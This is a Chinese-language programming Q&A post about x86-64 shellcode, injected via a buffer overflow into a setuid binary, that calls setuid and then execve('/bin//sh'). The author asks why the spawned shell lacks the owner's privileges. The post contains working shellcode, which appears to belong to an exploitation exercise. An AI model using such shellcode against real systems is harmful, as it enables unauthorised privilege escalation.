assembly - execve 之前无法在 shellcode 中设置 setuid()

问题描述

我有以下 shellcode，我可以说服 setuid 二进制文件作为缓冲区溢出的结果执行：

push 1009 ; #owner_userid
pop rdi
push 105
pop rax
syscall ; #sys_setuid(1009)

xor rsi, rsi
push rsi
mov rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
cdq
syscall ; #sys_execve('/bin//sh')

这成功地生成了一个 shell，但是当我在其中运行whoami时，我得到了自己的用户名，而不是二进制文件所有者的用户名（用户 ID #1009）。如何/bin/sh使用 setuid 二进制文件所有者的权限启动？

其他详情：

• GDB 显示这sys_setuid(1009)会将 -1 EPERM 返回到 $rax
• sys_getuid()在 shellcode 中运行会返回我自己的 UID (#1000)sys_geteuid
• 运行sys_setreuid(1009, 1009)还会将 -1 EPERM 返回到 $rax
• file <binary>输出binary: setuid ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked所以二进制肯定设置了setuid
• la -la给出：-rwsr-xr-x 1 target_user root 800118 Mar 1 13:40 binary
• 对于最终的 shellcode，我在技术上限制为 34 个字节，但这与这里的一般问题没有直接关系。

标签： assemblysystem-callsexploitshellcodesetuid